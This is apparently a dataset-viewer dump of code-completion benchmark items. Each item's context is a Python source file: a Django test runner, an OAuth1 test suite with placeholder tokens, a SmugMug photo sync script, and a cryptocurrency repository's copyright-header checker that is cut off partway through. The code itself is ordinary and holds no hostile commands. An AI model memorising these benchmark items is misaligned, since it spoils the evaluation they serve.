gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
import sys
import signal
from django.conf import settings
from django.db.models import get_app, get_apps
from django.test import _doctest as doctest
from django.test.utils import setup_test_environment, teardown_test_environment
from django.test.testcases import OutputChecker, DocTestRunner, TestCase
from django.utils import unittest
# The module name for tests outside models.py
TEST_MODULE = 'tests'
doctestOutputChecker = OutputChecker()
class DjangoTestRunner(unittest.TextTestRunner):
def __init__(self, verbosity=0, failfast=False, **kwargs):
super(DjangoTestRunner, self).__init__(verbosity=verbosity, **kwargs)
self.failfast = failfast
self._keyboard_interrupt_intercepted = False
def run(self, *args, **kwargs):
"""
Runs the test suite after registering a custom signal handler
that triggers a graceful exit when Ctrl-C is pressed.
"""
self._default_keyboard_interrupt_handler = signal.signal(signal.SIGINT,
self._keyboard_interrupt_handler)
try:
result = super(DjangoTestRunner, self).run(*args, **kwargs)
finally:
signal.signal(signal.SIGINT, self._default_keyboard_interrupt_handler)
return result
def _keyboard_interrupt_handler(self, signal_number, stack_frame):
"""
Handles Ctrl-C by setting a flag that will stop the test run when
the currently running test completes.
"""
self._keyboard_interrupt_intercepted = True
sys.stderr.write(" <Test run halted by Ctrl-C> ")
# Set the interrupt handler back to the default handler, so that
# another Ctrl-C press will trigger immediate exit.
signal.signal(signal.SIGINT, self._default_keyboard_interrupt_handler)
def _makeResult(self):
result = super(DjangoTestRunner, self)._makeResult()
failfast = self.failfast
def stoptest_override(func):
def stoptest(test):
# If we were set to failfast and the unit test failed,
# or if the user has typed Ctrl-C, report and quit
if (failfast and not result.wasSuccessful()) or \
self._keyboard_interrupt_intercepted:
result.stop()
func(test)
return stoptest
setattr(result, 'stopTest', stoptest_override(result.stopTest))
return result
def get_tests(app_module):
try:
app_path = app_module.__name__.split('.')[:-1]
test_module = __import__('.'.join(app_path + [TEST_MODULE]), {}, {}, TEST_MODULE)
except ImportError, e:
# Couldn't import tests.py. Was it due to a missing file, or
# due to an import error in a tests.py that actually exists?
import os.path
from imp import find_module
try:
mod = find_module(TEST_MODULE, [os.path.dirname(app_module.__file__)])
except ImportError:
# 'tests' module doesn't exist. Move on.
test_module = None
else:
# The module exists, so there must be an import error in the
# test module itself. We don't need the module; so if the
# module was a single file module (i.e., tests.py), close the file
# handle returned by find_module. Otherwise, the test module
# is a directory, and there is nothing to close.
if mod[0]:
mod[0].close()
raise
return test_module
def build_suite(app_module):
"Create a complete Django test suite for the provided application module"
suite = unittest.TestSuite()
# Load unit and doctests in the models.py module. If module has
# a suite() method, use it. Otherwise build the test suite ourselves.
if hasattr(app_module, 'suite'):
suite.addTest(app_module.suite())
else:
suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(app_module))
try:
suite.addTest(doctest.DocTestSuite(app_module,
checker=doctestOutputChecker,
runner=DocTestRunner))
except ValueError:
# No doc tests in models.py
pass
# Check to see if a separate 'tests' module exists parallel to the
# models module
test_module = get_tests(app_module)
if test_module:
# Load unit and doctests in the tests.py module. If module has
# a suite() method, use it. Otherwise build the test suite ourselves.
if hasattr(test_module, 'suite'):
suite.addTest(test_module.suite())
else:
suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(test_module))
try:
suite.addTest(doctest.DocTestSuite(test_module,
checker=doctestOutputChecker,
runner=DocTestRunner))
except ValueError:
# No doc tests in tests.py
pass
return suite
def build_test(label):
"""Construct a test case with the specified label. Label should be of the
form model.TestClass or model.TestClass.test_method. Returns an
instantiated test or test suite corresponding to the label provided.
"""
parts = label.split('.')
if len(parts) < 2 or len(parts) > 3:
raise ValueError("Test label '%s' should be of the form app.TestCase or app.TestCase.test_method" % label)
#
# First, look for TestCase instances with a name that matches
#
app_module = get_app(parts[0])
test_module = get_tests(app_module)
TestClass = getattr(app_module, parts[1], None)
# Couldn't find the test class in models.py; look in tests.py
if TestClass is None:
if test_module:
TestClass = getattr(test_module, parts[1], None)
try:
if issubclass(TestClass, unittest.TestCase):
if len(parts) == 2: # label is app.TestClass
try:
return unittest.TestLoader().loadTestsFromTestCase(TestClass)
except TypeError:
raise ValueError("Test label '%s' does not refer to a test class" % label)
else: # label is app.TestClass.test_method
return TestClass(parts[2])
except TypeError:
# TestClass isn't a TestClass - it must be a method or normal class
pass
#
# If there isn't a TestCase, look for a doctest that matches
#
tests = []
for module in app_module, test_module:
try:
doctests = doctest.DocTestSuite(module,
checker=doctestOutputChecker,
runner=DocTestRunner)
# Now iterate over the suite, looking for doctests whose name
# matches the pattern that was given
for test in doctests:
if test._dt_test.name in (
'%s.%s' % (module.__name__, '.'.join(parts[1:])),
'%s.__test__.%s' % (module.__name__, '.'.join(parts[1:]))):
tests.append(test)
except ValueError:
# No doctests found.
pass
# If no tests were found, then we were given a bad test label.
if not tests:
raise ValueError("Test label '%s' does not refer to a test" % label)
# Construct a suite out of the tests that matched.
return unittest.TestSuite(tests)
def partition_suite(suite, classes, bins):
"""
Partitions a test suite by test type.
classes is a sequence of types
bins is a sequence of TestSuites, one more than classes
Tests of type classes[i] are added to bins[i],
tests with no match found in classes are place in bins[-1]
"""
for test in suite:
if isinstance(test, unittest.TestSuite):
partition_suite(test, classes, bins)
else:
for i in range(len(classes)):
if isinstance(test, classes[i]):
bins[i].addTest(test)
break
else:
bins[-1].addTest(test)
def reorder_suite(suite, classes):
"""
Reorders a test suite by test type.
classes is a sequence of types
All tests of type clases[0] are placed first, then tests of type classes[1], etc.
Tests with no match in classes are placed last.
"""
class_count = len(classes)
bins = [unittest.TestSuite() for i in range(class_count+1)]
partition_suite(suite, classes, bins)
for i in range(class_count):
bins[0].addTests(bins[i+1])
return bins[0]
class DjangoTestSuiteRunner(object):
def __init__(self, verbosity=1, interactive=True, failfast=True, **kwargs):
self.verbosity = verbosity
self.interactive = interactive
self.failfast = failfast
def setup_test_environment(self, **kwargs):
setup_test_environment()
settings.DEBUG = False
def build_suite(self, test_labels, extra_tests=None, **kwargs):
suite = unittest.TestSuite()
if test_labels:
for label in test_labels:
if '.' in label:
suite.addTest(build_test(label))
else:
app = get_app(label)
suite.addTest(build_suite(app))
else:
for app in get_apps():
suite.addTest(build_suite(app))
if extra_tests:
for test in extra_tests:
suite.addTest(test)
return reorder_suite(suite, (TestCase,))
def setup_databases(self, **kwargs):
from django.db import connections
old_names = []
mirrors = []
for alias in connections:
connection = connections[alias]
# If the database is a test mirror, redirect it's connection
# instead of creating a test database.
if connection.settings_dict['TEST_MIRROR']:
mirrors.append((alias, connection))
mirror_alias = connection.settings_dict['TEST_MIRROR']
connections._connections[alias] = connections[mirror_alias]
else:
old_names.append((connection, connection.settings_dict['NAME']))
connection.creation.create_test_db(self.verbosity, autoclobber=not self.interactive)
return old_names, mirrors
def run_suite(self, suite, **kwargs):
return DjangoTestRunner(verbosity=self.verbosity, failfast=self.failfast).run(suite)
def teardown_databases(self, old_config, **kwargs):
from django.db import connections
old_names, mirrors = old_config
# Point all the mirrors back to the originals
for alias, connection in mirrors:
connections._connections[alias] = connection
# Destroy all the non-mirror databases
for connection, old_name in old_names:
connection.creation.destroy_test_db(old_name, self.verbosity)
def teardown_test_environment(self, **kwargs):
teardown_test_environment()
def suite_result(self, suite, result, **kwargs):
return len(result.failures) + len(result.errors)
def run_tests(self, test_labels, extra_tests=None, **kwargs):
"""
Run the unit tests for all the test labels in the provided list.
Labels must be of the form:
- app.TestClass.test_method
Run a single specific test method
- app.TestClass
Run all the test methods in a given class
- app
Search for doctests and unittests in the named application.
When looking for tests, the test runner will look in the models and
tests modules for the application.
A list of 'extra' tests may also be provided; these tests
will be added to the test suite.
Returns the number of tests that failed.
"""
self.setup_test_environment()
suite = self.build_suite(test_labels, extra_tests)
old_config = self.setup_databases()
result = self.run_suite(suite)
self.teardown_databases(old_config)
self.teardown_test_environment()
return self.suite_result(suite, result)
def run_tests(test_labels, verbosity=1, interactive=True, failfast=False, extra_tests=None):
import warnings
warnings.warn(
'The run_tests() test runner has been deprecated in favor of DjangoTestSuiteRunner.',
PendingDeprecationWarning
)
test_runner = DjangoTestSuiteRunner(verbosity=verbosity, interactive=interactive, failfast=failfast)
return test_runner.run_tests(test_labels, extra_tests=extra_tests)
|
|
# -*- coding: utf-8 -*-
'''
rauth.test_service_oauth1
-------------------------
Test suite for rauth.service.OAuth1Service.
'''
from base import RauthTestCase
from test_service import HttpMixin, RequestMixin, ServiceMixin
from rauth.compat import parse_qsl, quote, is_basestring, iteritems
from rauth.service import OAuth1Service
from rauth.session import OAUTH1_DEFAULT_TIMEOUT, OAuth1Session
from rauth.utils import CaseInsensitiveDict, ENTITY_METHODS, FORM_URLENCODED
from copy import deepcopy
from hashlib import sha1
from mock import patch
import rauth
import requests
import json
import pickle
class OAuth1ServiceTestCase(RauthTestCase, RequestMixin, ServiceMixin,
HttpMixin):
consumer_key = '000'
consumer_secret = '111'
access_token = '123'
access_token_secret = '456'
def setUp(self):
RauthTestCase.setUp(self)
self.request_token_url = 'http://example.com/request'
self.access_token_url = 'http://example.com/access'
self.authorize_url = 'http://example.com/authorize'
self.base_url = 'http://example.com/api/'
self.service = OAuth1Service(self.consumer_key,
self.consumer_secret,
name='service',
request_token_url=self.request_token_url,
access_token_url=self.access_token_url,
authorize_url=self.authorize_url,
base_url=self.base_url)
self.session = self.service.get_session(('123', '456'))
# patches
self.session.request = self.fake_request
self.service.get_session = self.fake_get_session
def fake_get_auth_header(self, oauth_params, realm=None):
auth_header = 'OAuth realm="{realm}"'.format(realm=realm)
params = ''
for k, v in iteritems(oauth_params):
params += ',{key}="{value}"'.format(key=k, value=quote(str(v)))
auth_header += params
return auth_header
@patch.object(rauth.session.HmacSha1Signature, 'sign')
@patch.object(rauth.session, 'time')
@patch.object(rauth.session, 'random')
@patch.object(requests.Session, 'request')
def fake_request(self,
method,
url,
mock_request,
mock_random,
mock_time,
mock_sig,
header_auth=False,
realm='',
**kwargs):
fake_random = 1
fake_time = 1
fake_sig = 'foo'
fake_sig_meth = 'HMAC-SHA1'
fake_nonce = sha1(str(fake_random).encode('ascii')).hexdigest()
mock_request.return_value = self.response
mock_random.return_value = fake_random
mock_time.return_value = fake_time
mock_sig.return_value = fake_sig
method = method
url = self.session._set_url(url)
service = OAuth1Service(self.consumer_key,
self.consumer_secret,
name='service',
request_token_url=self.request_token_url,
access_token_url=self.access_token_url,
authorize_url=self.authorize_url,
base_url=self.base_url)
session = service.get_session((self.access_token,
self.access_token_secret))
r = session.request(method,
url,
header_auth=header_auth,
realm=realm,
**deepcopy(kwargs))
kwargs.setdefault('headers', {})
kwargs['headers'] = CaseInsensitiveDict(kwargs['headers'])
entity_method = method.upper() in ENTITY_METHODS
if entity_method:
kwargs['headers'].setdefault('Content-Type', FORM_URLENCODED)
form_urlencoded = \
kwargs['headers'].get('Content-Type') == FORM_URLENCODED
if is_basestring(kwargs.get('params')):
kwargs['params'] = dict(parse_qsl(kwargs['params']))
if is_basestring(kwargs.get('data')) and form_urlencoded:
kwargs['data'] = dict(parse_qsl(kwargs['data']))
oauth_params = {'oauth_consumer_key': session.consumer_key,
'oauth_nonce': fake_nonce,
'oauth_signature_method': fake_sig_meth,
'oauth_timestamp': fake_time,
'oauth_token': self.access_token,
'oauth_version': session.VERSION,
'oauth_signature': fake_sig}
if header_auth:
auth = mock_request.call_args[1]['auth']
auth_header = self.fake_get_auth_header(oauth_params, realm=realm)
self.assertEqual(auth(requests.Request()).headers['Authorization'],
auth_header)
kwargs['auth'] = auth
elif entity_method:
kwargs['data'] = kwargs.get('data') or {}
if form_urlencoded:
kwargs['data'].update(oauth_params)
else:
kwargs.setdefault('params', {})
kwargs['params'].update(oauth_params)
else:
kwargs.setdefault('params', {})
kwargs['params'].update(**oauth_params)
mock_request.assert_called_with(method,
url,
timeout=OAUTH1_DEFAULT_TIMEOUT,
**kwargs)
return r
def fake_get_session(self, token=None, signature=None):
return self.session
def test_get_session(self):
s = self.service.get_session()
self.assertIsInstance(s, OAuth1Session)
def test_get_raw_request_token(self):
resp = 'oauth_token=foo&oauth_token_secret=bar'
self.response.content = resp
r = self.service.get_raw_request_token()
self.assertEqual(r.content, resp)
def test_get_raw_request_token_missing_request_token_url(self):
self.service.request_token_url = None
resp = 'oauth_token=foo&oauth_token_secret=bar'
self.response.content = resp
with self.assertRaises(TypeError) as e:
self.service.get_raw_request_token()
self.assertEqual(str(e.exception),
'request_token_url must not be None')
def test_get_request_token(self):
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
request_token, request_token_secret = self.service.get_request_token()
self.assertEqual(request_token, 'foo')
self.assertEqual(request_token_secret, 'bar')
def test_get_request_token_with_json_decoder(self):
self.response.content = json.dumps({'oauth_token': 'foo',
'oauth_token_secret': 'bar'})
request_token, request_token_secret = \
self.service.get_request_token(decoder=json.loads)
self.assertEqual(request_token, 'foo')
self.assertEqual(request_token_secret, 'bar')
def test_get_authorize_url(self):
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
request_token, request_token_secret = self.service.get_request_token()
url = self.service.get_authorize_url(request_token)
expected_fmt = 'http://example.com/authorize?oauth_token={0}'
self.assertEqual(url, expected_fmt.format(request_token))
def test_get_authorize_url_with_url_encoded_characters(self):
token = 'uDV8XWNLSJjzMUSVfbG1gYHWMjY%3D'
token_secret = 'e%2Bt9QCndiw1%2BtJbhy5UYVMAPTPo%3D'
response_fmt = 'oauth_token={0}&oauth_token_secret={1}'
self.response.content = response_fmt.format(token, token_secret)
request_token, request_token_secret = self.service.get_request_token()
url = self.service.get_authorize_url(request_token)
expected_fmt = 'http://example.com/authorize?oauth_token={0}'
self.assertEqual(url, expected_fmt.format(token))
def test_get_raw_access_token(self):
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
request_token, request_token_secret = self.service.get_request_token()
resp = 'oauth_token=foo&oauth_token_secret=bar'
self.response.content = resp
r = self.service.get_raw_access_token(request_token,
request_token_secret)
self.assertEqual(r.content, resp)
def test_get_raw_access_token_missing_access_token_url(self):
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
request_token, request_token_secret = self.service.get_request_token()
self.service.access_token_url = None
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
with self.assertRaises(TypeError) as e:
self.service.get_raw_access_token(request_token,
request_token_secret)
self.assertEqual(str(e.exception),
'access_token_url must not be None')
def test_get_access_token(self):
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
request_token, request_token_secret = self.service.get_request_token()
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
access_token, access_token_secret = \
self.service.get_access_token(request_token,
request_token_secret)
self.assertEqual(access_token, 'foo')
self.assertEqual(access_token_secret, 'bar')
def test_get_access_token_with_json_decoder(self):
self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
request_token, request_token_secret = self.service.get_request_token()
self.response.content = json.dumps({'oauth_token': 'foo',
'oauth_token_secret': 'bar'})
access_token, access_token_secret = \
self.service.get_access_token(request_token,
request_token_secret,
decoder=json.loads)
self.assertEqual(access_token, 'foo')
self.assertEqual(access_token_secret, 'bar')
def test_request_with_optional_params_oauth_callback(self):
params = {'oauth_callback': 'http://example.com/callback'}
r = self.session.request('GET', 'http://example.com/', params=params)
self.assert_ok(r)
def test_request_with_optional_params_oauth_verifier(self):
params = {'oauth_verifier': 'foo'}
r = self.session.request('GET', 'http://example.com/', params=params)
self.assert_ok(r)
def test_request_with_optional_params_oauth_version(self):
params = {'oauth_verifier': 'foo'}
r = self.session.request('GET', 'http://example.com/', params=params)
self.assert_ok(r)
def test_request_with_optional_params_as_string(self):
params = 'oauth_callback=http://example.com/callback'
r = self.session.request('GET', 'http://example.com/', params=params)
self.assert_ok(r)
def test_request_with_optional_data_as_string(self):
data = 'oauth_callback=http://example.com/callback'
r = self.session.request('POST', 'http://example.com/', data=data)
self.assert_ok(r)
def test_request_with_optional_params_with_data(self):
data = {'oauth_callback': 'http://example.com/callback'}
r = self.session.request('POST', 'http://example.com/', data=data)
self.assert_ok(r)
def test_request_with_header_auth(self):
r = self.session.request('GET',
'http://example.com/',
header_auth=True)
self.assert_ok(r)
def test_request_with_header_auth_with_realm(self):
r = self.session.request('GET',
'http://example.com/',
header_auth=True,
realm='http://example.com/foo/')
self.assert_ok(r)
def test_get_auth_session(self):
resp = 'oauth_token=foo&oauth_token_secret=bar'
self.response.content = resp
s = self.service.get_auth_session('foo', 'bar')
self.assertIsInstance(s, OAuth1Session)
def test_get_auth_session_with_request_token_response(self):
resp = 'oauth_token=foo&oauth_token_secret=bar'
self.response.content = resp
self.service.request_token_response = 'ok'
s = self.service.get_auth_session('foo', 'bar')
self.assertEqual(s.request_token_response, 'ok')
def test_pickle_session(self):
session = pickle.loads(pickle.dumps(self.session))
# Add the fake request back to the session
session.request = self.fake_request
r = session.request('GET', 'http://example.com/', header_auth=True)
self.assert_ok(r)
|
|
import filesystem
import smugmug
import connectorbase
import json
from PIL import Image, ExifTags
import time
from clint.textui import progress
from file import File
import file as fileConstants
import os
import shutil
import traceback
import ConfigParser
from file import FileEncoder
import pprint
def match_sets(file_array):
if file_array is None:
return []
result_sets = []
files = list(file_array)
while len(files) > 0:
first_file = files[0]
rest_files = files[1:]
matching_files = match(first_file, rest_files)
matching_files.append(first_file)
result_sets.append(matching_files)
for f in matching_files:
files.remove(f)
return result_sets
def match(file, files):
if files is None:
return []
matching_files = [f for f in files if do_files_match(file, f)]
return matching_files
def do_files_match(file1, file2):
if file1 is None or file2 is None:
return False
if file1.name == file2.name:
# if sizes match, this is a match
if file1.size == file2.size and file1.size is not None:
md51 = None
if file1.file_type == fileConstants.TYPE_FILESYSTEM:
md51 = file1.get_filesystem_md5()
else:
md51 = file1.md5
md52 = None
if file2.file_type == fileConstants.TYPE_FILESYSTEM:
md52 = file2.get_filesystem_md5()
else:
md52 = file2.md5
if md51 is not None and md51 == md52:
return True
# if sizes are close, check exif data
size_diff = abs(file1.size - file2.size) / float(file2.size)
if size_diff > 0.05:
return False
# check height/width, camera model
if file1.exif_height is None or file1.exif_width is None:
return False
sizes_match = file1.exif_height == file2.exif_height and file1.exif_width == file2.exif_width
if not sizes_match:
sizes_match = file1.exif_height == file2.exif_width and file1.exif_width == file2.exif_height
if sizes_match:
#if file1.exif_camera == file2.exif_camera and file1.exif_camera is not None:
if file1.exif_date_parsed is not None and file1.exif_date_parsed == file2.exif_date_parsed:
pass #return True
return False
def mirror(smc, smugmug, fs_folder, fs_file):
# Make sure the destination path exists
path = smugmug.relativePath
if path is None:
print 'Error: no relative path for file: ' + file.originalPath
return
path = path.lstrip('\\')
path = os.path.normpath(os.path.join(fs_folder, path))
dst = os.path.join(path, smugmug.name)
# Check if file is already there, skip it if it is.
if os.path.isfile(dst):
return
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
# If we have a fs file, copy from there, if not, fetch from smugmug.
if fs_file:
src = fs_file.originalPath
shutil.copy2(src, dst)
else:
smc.download(smugmug, dst)
def main():
start = time.clock()
config = ConfigParser.SafeConfigParser({'dest_path': 'e:\\'})
config.read("smugsync.cfg")
dest_path = config.get('smugsync', 'dest_path')
fs = filesystem.FileSystemConnector( { connectorbase.ROOT_KEY: dest_path } )
fs_files = fs.enumerate_objects()
end_fs = time.clock()
print 'Finished FS, time elapsed: %f' % (end_fs - start)
start = time.clock()
config_data = {}
try:
with open('smugmug.keys', 'r') as keys_file:
config_data = json.load(keys_file)
except Exception as e:
pass
smc = smugmug.SmugMugConnector(config_data)
smc.authenticate()
sm_files = smc.enumerate_objects()
end_sm = time.clock()
print 'Finished SM, time elapsed: %f' % (end_sm - start)
print '\r\n'
print '\r\n'
#for f in files:
# print json.dumps(f, indent = 2)
sm_count = 0
fs_count = 0
for sm_k in sm_files:
sm_count += len(sm_files[sm_k])
for fs_k in fs_files:
fs_count += len(fs_files[fs_k])
print 'SM total: %d FS total: %d' % (sm_count, fs_count)
print 'Starting file matching'
start = time.clock()
both =[]
sm = []
fs = []
fuzzy = 0
combined_files = {}
for fs_file_key in fs_files:
try:
# combine all the files into a single list
files_array = []
fs_file_array = fs_files[fs_file_key]
if fs_file_array is not None:
files_array += fs_file_array
sm_file_array = []
if fs_file_key in sm_files:
sm_file_array = sm_files[fs_file_key]
sm_files.pop(fs_file_key)
if sm_file_array is not None:
files_array += sm_file_array
combined_files[fs_file_key] = files_array
except Exception as e:
print 'Exception on ' + fs_file_key + ' :: ' + e.message
for sm_file_key in sm_files:
combined_files[sm_file_key] = sm_files[sm_file_key]
#csv = open('files.csv', 'w')
for file_key in progress.bar(combined_files):
files_array = combined_files[file_key]
matched_sets = match_sets(files_array)
all_both = True
for set in matched_sets:
has_sm = False
has_fs = False
sm_file = None
fs_file = None
for f in set:
if f.file_type == fileConstants.TYPE_SMUGMUG:
sm_file = sm_file if not sm_file is None else f
has_sm = True
if f.file_type == fileConstants.TYPE_FILESYSTEM:
fs_file = fs_file if not fs_file is None else f
has_fs = True
if has_sm and has_fs:
both.append(set)
mirror(smc, sm_file, dest_path, fs_file)
elif has_sm:
sm.append(set)
mirror(smc, sm_file, dest_path, None)
all_both = False
else:
fs.append(set)
all_both = False
#if not all_both:
# for set in matched_sets:
# csv.write(file_key)
# csv.write(',')
# for csv_file in set:
# csv.write('%s,%d,' % (csv_file.originalPath, csv_file.size))
# csv.write('\r\n')
#csv.close()
print 'Done: %f sec' % (time.clock()-start)
print 'Both: %d SM: %d FS: %d fuzzy: %d' % (len(both), len(sm), len(fs), fuzzy)
# Mirror smugmug to local path
# If we can find a matched pair, we have an md5sum identical file we can use.
if __name__ == "__main__":
try:
main()
except Exception as e:
print 'Exception: ' + e.message
tb = traceback.format_exc()
print tb
|
|
#!/usr/bin/env python3
# Copyright (c) 2016-2019 The Bitcoin Core developers
# Copyright (c) 2015-2018 The PIVX developers
# Copyright (c) 2018-2019 The Ion developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import re
import fnmatch
import sys
import subprocess
import datetime
import os
################################################################################
# file filtering
################################################################################
EXCLUDE = [
# libsecp256k1:
'src/secp256k1/include/secp256k1.h',
'src/secp256k1/include/secp256k1_ecdh.h',
'src/secp256k1/include/secp256k1_recovery.h',
'src/secp256k1/include/secp256k1_schnorr.h',
'src/secp256k1/src/java/org_bitcoin_NativeSecp256k1.c',
'src/secp256k1/src/java/org_bitcoin_NativeSecp256k1.h',
'src/secp256k1/src/java/org_bitcoin_Secp256k1Context.c',
'src/secp256k1/src/java/org_bitcoin_Secp256k1Context.h',
# univalue:
'src/univalue/test/object.cpp',
'src/univalue/lib/univalue_escapes.h',
# auto generated:
'src/qt/ioncoinstrings.cpp',
'src/chainparamsseeds.h',
# other external copyrights:
'src/tinyformat.h',
'src/leveldb/util/env_win.cc',
'src/crypto/ctaes/bench.c',
'test/functional/test_framework/bignum.py',
# python init:
'*__init__.py',
]
EXCLUDE_COMPILED = re.compile('|'.join([fnmatch.translate(m) for m in EXCLUDE]))
INCLUDE = ['*.h', '*.cpp', '*.cc', '*.c', '*.py']
INCLUDE_COMPILED = re.compile('|'.join([fnmatch.translate(m) for m in INCLUDE]))
def applies_to_file(filename):
return ((EXCLUDE_COMPILED.match(filename) is None) and
(INCLUDE_COMPILED.match(filename) is not None))
################################################################################
# obtain list of files in repo according to INCLUDE and EXCLUDE
################################################################################
GIT_LS_CMD = 'git ls-files'
def call_git_ls():
out = subprocess.check_output(GIT_LS_CMD.split(' '))
return [f for f in out.decode("utf-8").split('\n') if f != '']
def get_filenames_to_examine():
filenames = call_git_ls()
return sorted([filename for filename in filenames if
applies_to_file(filename)])
################################################################################
# define and compile regexes for the patterns we are looking for
################################################################################
COPYRIGHT_WITH_C = 'Copyright \(c\)'
COPYRIGHT_WITHOUT_C = 'Copyright'
ANY_COPYRIGHT_STYLE = '(%s|%s)' % (COPYRIGHT_WITH_C, COPYRIGHT_WITHOUT_C)
YEAR = "20[0-9][0-9]"
YEAR_RANGE = '(%s)(-%s)?' % (YEAR, YEAR)
YEAR_LIST = '(%s)(, %s)+' % (YEAR, YEAR)
ANY_YEAR_STYLE = '(%s|%s)' % (YEAR_RANGE, YEAR_LIST)
ANY_COPYRIGHT_STYLE_OR_YEAR_STYLE = ("%s %s" % (ANY_COPYRIGHT_STYLE,
ANY_YEAR_STYLE))
ANY_COPYRIGHT_COMPILED = re.compile(ANY_COPYRIGHT_STYLE_OR_YEAR_STYLE)
def compile_copyright_regex(copyright_style, year_style, name):
return re.compile('%s %s %s' % (copyright_style, year_style, name))
EXPECTED_HOLDER_NAMES = [
"Satoshi Nakamoto\n",
"The Bitcoin Core developers\n",
"The Bitcoin Core developers \n",
"Bitcoin Core Developers\n",
"the Bitcoin Core developers\n",
"The Bitcoin developers\n",
"The Pivx Core developers\n",
"The Pivx Core developers \n",
"Pivx Core Developers\n",
"the Pivx Core developers\n",
"The Pivx developers\n",
"The PIVX Core developers\n",
"The PIVX Core developers \n",
"PIVX Core Developers\n",
"the PIVX Core developers\n",
"The PIVX developers\n",
"The Pivx Core developers\n",
"The Pivx Core developers \n",
"Pivx Core Developers\n",
"the Pivx Core developers\n",
"The Pivx developers\n",
"cevap\n",
"Ion Tor\n",
"The ION Core Developers\n",
"The ION Core Developers \n",
"Ion Core Developers\n",
"the ION Core Developers\n",
"The Ion developers\n",
"The ION Core developers\n",
"The ION Core developers \n",
"ION Core Developers\n",
"the ION Core developers\n",
"The ION developers\n",
"The ION Core Developers\n",
"The ION Core Developers \n",
"Ion Core Developers\n",
"the ION Core Developers\n",
"The Ion developers\n",
"The LevelDB Authors\. All rights reserved\.\n",
"BitPay Inc\.\n",
"BitPay, Inc\.\n",
"University of Illinois at Urbana-Champaign\.\n",
"MarcoFalke\n",
"Pieter Wuille\n",
"Pieter Wuille +\*\n",
"Pieter Wuille, Gregory Maxwell +\*\n",
"Pieter Wuille, Andrew Poelstra +\*\n",
"Andrew Poelstra +\*\n",
"Wladimir J. van der Laan\n",
"Jeff Garzik\n",
"Diederik Huys, Pieter Wuille +\*\n",
"Thomas Daede, Cory Fields +\*\n",
"Jan-Klaas Kollhof\n",
"Sam Rushing\n",
"ArtForz -- public domain half-a-node\n",
]
DOMINANT_STYLE_COMPILED = {}
YEAR_LIST_STYLE_COMPILED = {}
WITHOUT_C_STYLE_COMPILED = {}
for holder_name in EXPECTED_HOLDER_NAMES:
DOMINANT_STYLE_COMPILED[holder_name] = (
compile_copyright_regex(COPYRIGHT_WITH_C, YEAR_RANGE, holder_name))
YEAR_LIST_STYLE_COMPILED[holder_name] = (
compile_copyright_regex(COPYRIGHT_WITH_C, YEAR_LIST, holder_name))
WITHOUT_C_STYLE_COMPILED[holder_name] = (
compile_copyright_regex(COPYRIGHT_WITHOUT_C, ANY_YEAR_STYLE,
holder_name))
################################################################################
# search file contents for copyright message of particular category
################################################################################
def get_count_of_copyrights_of_any_style_any_holder(contents):
return len(ANY_COPYRIGHT_COMPILED.findall(contents))
def file_has_dominant_style_copyright_for_holder(contents, holder_name):
match = DOMINANT_STYLE_COMPILED[holder_name].search(contents)
return match is not None
def file_has_year_list_style_copyright_for_holder(contents, holder_name):
match = YEAR_LIST_STYLE_COMPILED[holder_name].search(contents)
return match is not None
def file_has_without_c_style_copyright_for_holder(contents, holder_name):
match = WITHOUT_C_STYLE_COMPILED[holder_name].search(contents)
return match is not None
################################################################################
# get file info
################################################################################
def read_file(filename):
return open(os.path.abspath(filename), 'r').read()
def gather_file_info(filename):
info = {}
info['filename'] = filename
c = read_file(filename)
info['contents'] = c
info['all_copyrights'] = get_count_of_copyrights_of_any_style_any_holder(c)
info['classified_copyrights'] = 0
info['dominant_style'] = {}
info['year_list_style'] = {}
info['without_c_style'] = {}
for holder_name in EXPECTED_HOLDER_NAMES:
has_dominant_style = (
file_has_dominant_style_copyright_for_holder(c, holder_name))
has_year_list_style = (
file_has_year_list_style_copyright_for_holder(c, holder_name))
has_without_c_style = (
file_has_without_c_style_copyright_for_holder(c, holder_name))
info['dominant_style'][holder_name] = has_dominant_style
info['year_list_style'][holder_name] = has_year_list_style
info['without_c_style'][holder_name] = has_without_c_style
if has_dominant_style or has_year_list_style or has_without_c_style:
info['classified_copyrights'] = info['classified_copyrights'] + 1
return info
################################################################################
# report execution
################################################################################
SEPARATOR = '-'.join(['' for _ in range(80)])
def print_filenames(filenames, verbose):
if not verbose:
return
for filename in filenames:
print("\t%s" % filename)
def print_report(file_infos, verbose):
print(SEPARATOR)
examined = [i['filename'] for i in file_infos]
print("%d files examined according to INCLUDE and EXCLUDE fnmatch rules" %
len(examined))
print_filenames(examined, verbose)
print(SEPARATOR)
print('')
zero_copyrights = [i['filename'] for i in file_infos if
i['all_copyrights'] == 0]
print("%4d with zero copyrights" % len(zero_copyrights))
print_filenames(zero_copyrights, verbose)
one_copyright = [i['filename'] for i in file_infos if
i['all_copyrights'] == 1]
print("%4d with one copyright" % len(one_copyright))
print_filenames(one_copyright, verbose)
two_copyrights = [i['filename'] for i in file_infos if
i['all_copyrights'] == 2]
print("%4d with two copyrights" % len(two_copyrights))
print_filenames(two_copyrights, verbose)
three_copyrights = [i['filename'] for i in file_infos if
i['all_copyrights'] == 3]
print("%4d with three copyrights" % len(three_copyrights))
print_filenames(three_copyrights, verbose)
four_or_more_copyrights = [i['filename'] for i in file_infos if
i['all_copyrights'] >= 4]
print("%4d with four or more copyrights" % len(four_or_more_copyrights))
print_filenames(four_or_more_copyrights, verbose)
print('')
print(SEPARATOR)
print('Copyrights with dominant style:\ne.g. "Copyright (c)" and '
'"<year>" or "<startYear>-<endYear>":\n')
for holder_name in EXPECTED_HOLDER_NAMES:
dominant_style = [i['filename'] for i in file_infos if
i['dominant_style'][holder_name]]
if len(dominant_style) > 0:
print("%4d with '%s'" % (len(dominant_style),
holder_name.replace('\n', '\\n')))
print_filenames(dominant_style, verbose)
print('')
